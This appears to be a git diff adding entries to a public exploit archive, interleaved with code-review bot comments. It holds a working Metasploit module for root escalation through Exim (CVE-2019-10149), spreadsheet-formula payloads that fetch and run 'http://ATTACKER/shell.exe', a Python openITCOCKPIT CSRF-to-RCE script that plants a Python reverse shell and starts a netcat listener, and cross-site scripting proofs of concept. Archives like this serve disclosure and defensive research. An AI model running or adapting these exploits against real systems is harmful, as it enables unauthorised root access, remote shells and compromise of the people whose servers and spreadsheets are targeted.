diff --git a/exploits/linux/local/47307.rb b/exploits/linux/local/47307.rb
new file mode 100755
index 000000000..a116ab597
--- /dev/null
+++ b/exploits/linux/local/47307.rb
@@ -0,0 +1,261 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'expect' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation', + 'Description' => %q{ + This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). + Improper validation of recipient address in deliver_message() + function in /src/deliver.c may lead to command execution with root privileges + (CVE-2019-10149). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Qualys', # Discovery and PoC (@qualys) + 'Dennis Herrmann', # Working exploit (@dhn) + 'Marco Ivaldi', # Working exploit (@0xdea) + 'Guillaume André' # Metasploit module (@yaumn_) + ], + 'DisclosureDate' => '2019-06-05', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ + 'Exim 4.87 - 4.91', + lower_version: Gem::Version.new('4.87'), + upper_version: Gem::Version.new('4.91') + ] + ], + 'DefaultOptions' => + { + 'PrependSetgid' => true, + 'PrependSetuid' => true + }, + 'References' => + [ + [ 'CVE', '2019-10149' ], + [ 'EDB', '46996' ], + [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ] + ] + )) + + register_options( + [ + OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ]) + ]) + + register_advanced_options( + [ + OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]), + OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def base_dir + 
datastore['WritableDir'].to_s + end + + def encode_command(cmd) + '\x' + cmd.unpack('H2' * cmd.length).join('\x') + end + + def open_tcp_connection + socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client) + params = Rex::Socket::Parameters.new({ + 'PeerHost' => '127.0.0.1', + 'PeerPort' => datastore['EXIMPORT'] + }) + begin + socket = socket_subsystem.create_tcp_client_channel(params) + rescue => e + vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\ + "are you sure exim is listening on this port? (see EXIMPORT)") + raise e + end + return socket_subsystem, socket + end + + def inject_payload(payload) + if session.type == 'meterpreter' + socket_subsystem, socket = open_tcp_connection + + tcp_conversation = { + nil => /220/, + 'helo localhost' => /250/, + "MAIL FROM:<>" => /250/, + "RCPT TO:<${run{#{payload}}}@localhost>" => /250/, + 'DATA' => /354/, + 'Received:' => nil, + '.' => /250/ + } + + begin + tcp_conversation.each do |line, pattern| + Timeout.timeout(datastore['SendExpectTimeout']) do + if line + if line == 'Received:' + for i in (1..31) + socket.puts("#{line} #{i}\n") + end + else + socket.puts("#{line}\n") + end + end + if pattern + socket.expect(pattern) + end + end + end + rescue Rex::ConnectionError => e + fail_with(Failure::Unreachable, e.message) + rescue Timeout::Error + fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out') + ensure + socket.puts("QUIT\n") + socket.close + socket_subsystem.shutdown + end + else + unless cmd_exec("/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' "\ + "&& echo true").chomp.to_s == 'true' + fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed") + end + + bash_script = %| + #!/bin/bash + + exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']} + read -u 3 && echo $REPLY + echo "helo localhost" >&3 + read -u 3 && echo $REPLY + echo "mail from:<>" >&3 + read -u 3 && echo $REPLY + echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3 + 
read -u 3 && echo $REPLY + echo "data" >&3 + read -u 3 && echo $REPLY + for i in $(seq 1 30); do + echo 'Received: $i' >&3 + done + echo "." >&3 + read -u 3 && echo $REPLY + echo "quit" >&3 + read -u 3 && echo $REPLY + | + + @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) + write_file(@bash_script_path, bash_script) + register_file_for_cleanup(@bash_script_path) + chmod(@bash_script_path) + cmd_exec("/bin/bash -c \"#{@bash_script_path}\"") + end + + print_status('Payload sent, wait a few seconds...') + Rex.sleep(5) + end + + def check_for_bash + unless command_exists?('/bin/bash') + fail_with(Failure::NotFound, 'bash not found') + end + end + + def on_new_session(session) + super + + if session.type == 'meterpreter' + session.core.use('stdapi') unless session.ext.aliases.include?('stdapi') + session.fs.file.rm(@payload_path) + else + session.shell_command_token("rm -f #{@payload_path}") + end + end + + def check + if session.type == 'meterpreter' + begin + socket_subsystem, socket = open_tcp_connection + rescue + return CheckCode::Safe + end + res = socket.gets + socket.close + socket_subsystem.shutdown + else + check_for_bash + res = cmd_exec("/bin/bash -c 'exec 3= target[:lower_version] && version <= target[:upper_version] + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + CheckCode::Unknown + end + + def exploit + if is_root? + unless datastore['ForceExploit'] + fail_with(Failure::BadConfig, 'Session already has root privileges. 
Set ForceExploit to override.') + end + end + + unless writable?(base_dir) + fail_with(Failure::BadConfig, "#{base_dir} is not writable") + end + + if nosuid?(base_dir) + fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid") + end + + unless datastore['PrependSetuid'] && datastore['PrependSetgid'] + fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \ + 'to get root privileges.') + end + + if session.type == 'shell' + check_for_bash + end + + @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) + write_file(@payload_path, payload.encoded_exe) + register_file_for_cleanup(@payload_path) + inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};"\ + "chmod 4755 #{@payload_path}'")) + + unless setuid?(@payload_path) + fail_with(Failure::Unknown, "Couldn't escalate privileges") + end + + cmd_exec("#{@payload_path} & echo ") + end +end \ No newline at end of file diff --git a/exploits/linux/remote/47230.rb b/exploits/linux/remote/47230.rb index 800821c83..f784eb136 100755 --- a/exploits/linux/remote/47230.rb +++ b/exploits/linux/remote/47230.rb 
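Review bot: In `check`, the meterpreter branch reads the banner with `res = socket.gets` and only afterwards calls `socket.close` and `socket_subsystem.shutdown`, so an exception or hang on that read leaves the channel open; `inject_payload` already puts the same cleanup in an `ensure`, and `check` should wrap the read the same way (`begin` / `res = socket.gets` / `ensure` / `socket.close; socket_subsystem.shutdown` / `end`). The two transport branches of `inject_payload` also disagree: the meterpreter branch loops `for i in (1..31)` while the bash script runs `seq 1 30` and, because `'Received: $i'` is single-quoted, writes `$i` literally; if that difference is intended a comment should say so, and `(1..31).each` is the idiomatic form that does not leak `i` into the method scope. Parts of `check` (the `cmd_exec` call and the version comparison) are truncated on this page, so that section cannot be reviewed here.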
@@ -11,14 +11,19 @@ class MetasploitModule < Msf::Exploit::Remote
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Webmin 1.920 Unauthenticated RCE',
- 'Description' => %q(
- This module exploits an arbitrary command execution vulnerability in Webmin
- 1.920 and prior versions. If the password change module is turned on, the unathenticated user
- can execute arbitrary commands with root privileges.
-
- /////// This 0day has been published at DEFCON-AppSec Village. ///////
+ 'Description' => %q{
+ This module exploits a backdoor in Webmin versions 1.890 through 1.920.
+ Only the SourceForge downloads were backdoored, but they are listed as
+ official downloads on the project's site.
- ),
+ Unknown attacker(s) inserted Perl qx statements into the build server's
+ source code on two separate occasions: once in April 2018, introducing
+ the backdoor in the 1.890 release, and in July 2018, reintroducing the
+ backdoor in releases 1.900 through 1.920.
+
+ Only version 1.890 is exploitable in the default install. Later affected
+ versions require the expired password changing feature to be enabled.
+ },
 'Author' =>
 [
 'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
 ],
diff --git a/exploits/php/webapps/47303.txt b/exploits/php/webapps/47303.txt
new file mode 100644
index 000000000..3470edb74
--- /dev/null
+++ b/exploits/php/webapps/47303.txt
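Review bot: The rewritten Description now attributes the issue to a backdoor in Webmin 1.890 through 1.920, but the unchanged `'Name'` line directly above still reads `'Webmin 1.920 Unauthenticated RCE'` and the `'Author'` comment below still credits a discovery of the original command-execution finding, so the module's metadata contradicts its own description; the Name should be updated to cover the stated range (something like `'Webmin 1.890 - 1.920 Backdoor RCE'`, wording to be confirmed by the maintainers). The new text also asserts specific dates and a root cause (Perl `qx` statements inserted on the build server) without citing a source, and the `'References'` array, if the module has one, lies outside this hunk; the reference supporting that claim should be added alongside the text. `initialize` continues past the end of the hunk.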
@@ -0,0 +1,48 @@ +# Exploit Title: Wordpress Plugin Import Export WordPress Users <= 1.3.1 - CSV Injection +# Exploit Author: Javier Olmedo +# Contact: @jjavierolmedo +# Website: https://sidertia.com +# Date: 2018-08-22 +# Google Dork: inurl:"/wp-content/plugins/users-customers-import-export-for-wp-woocommerce" +# Vendor: WebToffee +# Software Link: https://downloads.wordpress.org/plugin/users-customers-import-export-for-wp-woocommerce.1.3.1.zip +# Affected Version: 1.3.1 and before +# Active installations: +20,000 +# Patched Version: update to 1.3.2 version +# Category: Web Application +# Platform: PHP +# Tested on: Win10x64 +# CVE: 2019-15092 +# References: +# https://hackpuntes.com/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/ +# https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 + +# 1. Technical Description +# Wordpress Plugin Import Export WordPress Users version 1.3.1. and before are affected by Remote Code +# Execution through the CSV injection vulnerability. This allows any application user to inject commands +# as part of the fields of his profile and these commands are executed when a user with greater privilege +# exports the data in CSV and opens that file on his machine. + +# 2. Vulnerable code +# The function do_export() from WF_CustomerImpExpCsv_Exporter class does not check if fields beggings +# with (=, +, -, @) characters so the fields name, surname, alias or display_name are vulnerable to CSV Injection. + +# 3. Proof Of Concept (PoC) +# 3.1 Login with subscriber user and change the fields First name, Surname and Alias with payloads. +# 3.2 Login with a high privileges user and export all users to CSV. +# 3.3 When the user with high privileges logs in to the application, export data in CSV and opens the +# generated file, the command is executed and the shell will run open on the machine. + +# 4. 
Payloads +=cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 ++cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 +-cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 +@cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 + +# 5. Timeline +# 15, august 2019 - [RESEARCHER] Discover +# 15, august 2019 - [RESEARCHER] Report to Webtoffee support +# 16, august 2019 - [DEVELOPER] More information request +# 16, august 2019 - [RESEARCHER] Detailed vulnerability report +# 19, august 2019 - [DEVELOPER] Unrecognized vulnerability +# 22, august 2019 - [RESEARCHER] Public disclosure \ No newline at end of file diff --git a/exploits/php/webapps/47304.txt b/exploits/php/webapps/47304.txt new file mode 100644 index 000000000..af6848a7a --- /dev/null +++ b/exploits/php/webapps/47304.txt @@ -0,0 +1,27 @@ +# Exploit Title: UserPro <= 4.9.32 Reflected XSS +# Google Dork: intitle:"Index of" intitle:"UserPro" -uploads +# Date: 25 August 2019 +# Exploit Author: Damian Ebelties (https://zerodays.lol/) +# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 +# Version: <= 4.9.32 +# Tested on: Ubuntu 18.04.1 +# CVE: CVE-2019-14470 + +The WordPress plug-in 'UserPro' uses a Instagram library (Instagram PHP API V2 by cosenary) that +is vulnerable for Reflected Cross-Site Scripting (XSS). + +There is more vulnerable code in 'UserPro' core, might release that later. + +As of today (25 August 2019) this issue is unfixed. + +Vulnerable code: (success.php on line 36) + + if (isset($_GET['error'])) { + echo 'An error occurred: ' . $_GET['error_description']; + } + + > https://github.com/cosenary/Instagram-PHP-API/blob/master/example/success.php#L36 + +Proof-of-Concept: + + https://domain.tld/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description= \ No newline at end of file 
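Review bot: The Technical Description and Vulnerable code sections name the four leading characters (`=`, `+`, `-`, `@`) that the export does not check, but the advisory never states what the fix in the 'Patched Version' does or how a reader can verify it; a line such as `# Mitigation: exported cells that begin with =, +, -, or @ should be escaped (e.g. prefixed with a single quote) so spreadsheet applications treat them as text` would let readers confirm 1.3.2 and check their own exporters. The Vulnerable code section names `do_export()` in `WF_CustomerImpExpCsv_Exporter` but quotes no code, so that claim cannot be checked from the advisory alone; 'beggings' should read 'begins'.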
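Review bot: The Vulnerable code excerpt shows `$_GET['error_description']` echoed straight into the response, which is the defect, but the advisory does not say what the fix looks like; noting that the value must be encoded before output (`htmlspecialchars($_GET['error_description'], ENT_QUOTES, 'UTF-8')`) and that the affected file is a vendored library example (`example/success.php`) that does not need to ship with the plugin — so removing the `example` directory removes the exposure — would make the report actionable for defenders. The query values in the Proof-of-Concept URL are stripped on this page (`?error=&error_description=`), so the actual vector cannot be reviewed here. 'a Instagram library' should read 'an Instagram library'.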
diff --git a/exploits/php/webapps/47305.py b/exploits/php/webapps/47305.py new file mode 100755 index 000000000..ec64d4be5 --- /dev/null +++ b/exploits/php/webapps/47305.py @@ -0,0 +1,110 @@ +# Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE +# Google Dork: N/A +# Date: 26-08-2019 +# Exploit Author: Julian Rittweger +# Vendor Homepage: https://openitcockpit.io/ +# Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2 +# Fixed in: 3.7.1 | https://github.com/it-novum/openITCOCKPIT/releases +# Version: 3.6.1-2 +# Tested on: Debian 9 +# CVE : 2019-10227 +# Exploit Requirements: pip3 install bs4 requests && apt install netcat + +#!/usr/bin/env python +import requests, urllib3, os +import http.server, socketserver + +from bs4 import BeautifulSoup as bs +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +print(""" +-- + openITCOCKPIT v.3.6.1-2 + [CSRF 2 RCE] +-- +""") + +# Setup values +RHOST = input('[x] Enter IP of remote machine: ') +LHOST = input('[x] Enter IP of local machine: ') +RPORT = int(input('[x] Enter local port (back-connection): ')) +LPORT = int(input('[x] Enter local port (payload-hosting): ')) + +print('[-] Generating CSRF form using the following credentials: "hacked@oicp.app - letmein1337" ..') + +# Generate file which serves CSRF payload +pl = open('./index.html', 'w') +# Register HTTP server +handler = http.server.SimpleHTTPRequestHandler + +csrf = """ + +
+ + + + + + + + + + + +
+ +""" + +pl.write(csrf) +pl.close() +httpd = socketserver.TCPServer(("", LPORT), handler) + +# Start HTTP server, quit on keyboard interrupt +try: + print('[!] Serving payload at port : ' + str(LPORT) + ', press STRG+C if you registered requests!') + print('[!] Send this URL to a logged-in administrator: http://' + LHOST + ':' + str(LPORT)) + httpd.serve_forever() +except KeyboardInterrupt: + httpd.socket.close() + print('\n[-] Starting exploitation ..') + +print('[-] Logging in ..') +# Proceed login with generated credentials +c = requests.post('https://' + RHOST + '/login/login', data={'_method' : 'POST', 'data[LoginUser][username]' : 'hacked@oicp.app', 'data[LoginUser][password]' : 'letmein1337'}, verify=False, allow_redirects=False).headers['Set-Cookie'] +print('[!] Received cookie: ' + c.split(';')[0]) +print('[-] Creating reverse-shell as macro ..') +# Insert a new macro identified as $USER99$ +makro = {'_method' : 'POST', 'data[0][Macro][id]' : 1, 'data[0][Macro][name]' : '$USER1$', 'data[0][Macro][value]' : '/opt/openitc/nagios/libexec', 'data[0][Macro][description]' : 'default', 'data[0][Macro][password]' : 0, 'data[1][Macro][id]' : 2, 'data[1][Macro][name]' : '$USER99$', 'data[1][Macro][value]' : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(RPORT) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", 'data[1][Macro][password]' : 1} +requests.post('https://' + RHOST + '/macros', data=makro, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}) +print('[-] Inserting macro as command ..') +# Register a new command using the inserted macro +requests.post('https://' + RHOST + '/commands/add/_controller:commands/_action:hostchecks', data={'_method' : 'POST', 'data[Command][command_type]' : 2, 'data[Command][name]' : 'pwned', 'data[Command][command_line]' : '$USER99$'}, verify=False, cookies={'itnovum' : 
c.split(';')[0].split('=')[1]}) +h = bs(requests.get('https://' + RHOST + '/commands/hostchecks', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}).text, 'html.parser') +ids = [] + +# Fetch current commands by ID +for i in h.find_all('form', {'action': lambda x : x.startswith('/commands/delete')}): + ids.append(i.get('action').split('/')[-1]) + +print('[!] ID of command identified as: ' + str(ids[-1])) +print('[-] Updating default host ..') + +# Update host, using the new malicious "hostcheck" command +sett = {'_method':'POST','data[Host][id]':'1','data[Host][container_id]':'1','data[Host][shared_container]':'','data[Host][hosttemplate_id]':'1','data[Host][name]':'localhost','data[Host][description]':'default+host','data[Host][address]':'127.0.0.1','data[Host][Hostgroup]':'','data[Host][Parenthost]':'','data[Host][notes]':'','data[Host][host_url]':'','data[Host][priority]':'1','data[Host][tags]':'','data[Host][notify_period_id]':'1','data[Host][notification_interval]':'0','data[Host][notification_interval]':'0','data[Host][notify_on_recovery]':'0','data[Host][notify_on_recovery]':'1','data[Host][notify_on_down]':'0','data[Host][notify_on_unreachable]':'0','data[Host][notify_on_unreachable]':'1','data[Host][notify_on_flapping]':'0','data[Host][notify_on_downtime]':'0','data[Host][active_checks_enabled]':'0','data[Host][active_checks_enabled]':'1','data[Host][Contact]':'','data[Host][Contact][]':'1','data[Host][Contactgroup]':'','data[Host][command_id]':ids[-1],'data[Host][check_period_id]':'1','data[Host][max_check_attempts]':'3','data[Host][check_interval]':'120','data[Host][check_interval]':'120','data[Host][retry_interval]':'120','data[Host][retry_interval]':'120','data[Host][flap_detection_enabled]':'0','data[Host][flap_detection_on_up]':'0','data[Host][flap_detection_on_down]':'0', 'data[Host][flap_detection_on_unreachable]' : 0} +requests.post('https://' + RHOST + '/hosts/edit/1/_controller:hosts/_action:browser/_id:1/', data=sett, 
verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}) + +# Refresh host configuration +print('[-] Refreshing host configuration ..') +requests.get('https://' + RHOST + '/exports/launchExport/0.json', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}, headers={'X-Requested-With' : 'XMLHttpRequest'}) + +print('[!] Done! Enjoy your shell (popup in approx. 30s): ') + +# We did it! +os.system('nc -lvp ' + str(RPORT)) \ No newline at end of file diff --git a/exploits/windows/webapps/47302.txt b/exploits/windows/webapps/47302.txt new file mode 100644 index 000000000..a5ed01e71 --- /dev/null +++ b/exploits/windows/webapps/47302.txt @@ -0,0 +1,23 @@ +# Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS) +# Google Dork: intitle:LISTSERV 16.5 +# Date: 08-21-2019 +# Exploit Author: MTK (http://mtk911.cf/) +# Vendor Homepage: http://www.lsoft.com/ +# Softwae Link: http://www.lsoft.com/products/listserv.asp +# Version: Older than Ver 16.5-2018a +# Tested on: IIS 8.5/10.0 - Firefox/Windows +# CVE : CVE-2019-15501 + +# Software description: +The term Listserv has been used to refer to electronic mailing list software applications in general, +but is more properly applied to a few early instances of such software, which allows a sender to send one +email to the list, and then transparently sends it on to the addresses of the subscribers to the list. + +# POC + +1. http://127.0.0.1/scripts/wa.exe?OK= +2. http://127.0.0.1/scripts/wa.exe?OK= + +# References: +1. http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf +2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 026eddfa1..f4978b276 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
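Review bot: The `#!/usr/bin/env python` line sits after the comment header rather than on line 1, so it is not an active shebang, and the script imports `http.server`, which exists only in Python 3; it should be the first line of the file and read `#!/usr/bin/env python3`. The `sett` dictionary literal repeats several keys (`data[Host][notification_interval]`, `data[Host][notify_on_recovery]`, `data[Host][notify_on_unreachable]`, `data[Host][active_checks_enabled]`, `data[Host][check_interval]`, `data[Host][retry_interval]`), and Python silently keeps only the last value of each; the duplicates should be removed or the intended value documented. `pl = open('./index.html', 'w')` is never closed if `pl.write(csrf)` raises; `with open('./index.html', 'w') as pl:` is the idiomatic form. The embedded HTML form and several other lines are stripped on this page, so the CSRF body itself cannot be reviewed here.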
@@ -10661,6 +10661,7 @@ id,file,description,date,author,type,platform,port
 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
 47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
 47258,exploits/windows/local/47258.txt,"Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities",2019-08-15,"Google Security Research",local,windows,
+47307,exploits/linux/local/47307.rb,"Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)",2019-08-26,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41658,3 +41659,7 @@ id,file,description,date,author,type,platform,port
 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
 47295,exploits/php/webapps/47295.html,"WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,
 47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple,
+47302,exploits/windows/webapps/47302.txt,"LSoft ListServ < 16.5-2018a - Cross-Site Scripting",2019-08-26,MTK,webapps,windows,
+47303,exploits/php/webapps/47303.txt,"WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection",2019-08-26,"Javier Olmedo",webapps,php,80
+47304,exploits/php/webapps/47304.txt,"WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting",2019-08-26,"Damian Ebelties",webapps,php,80
+47305,exploits/php/webapps/47305.py,"openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery",2019-08-26,"Julian Rittweger",webapps,php,80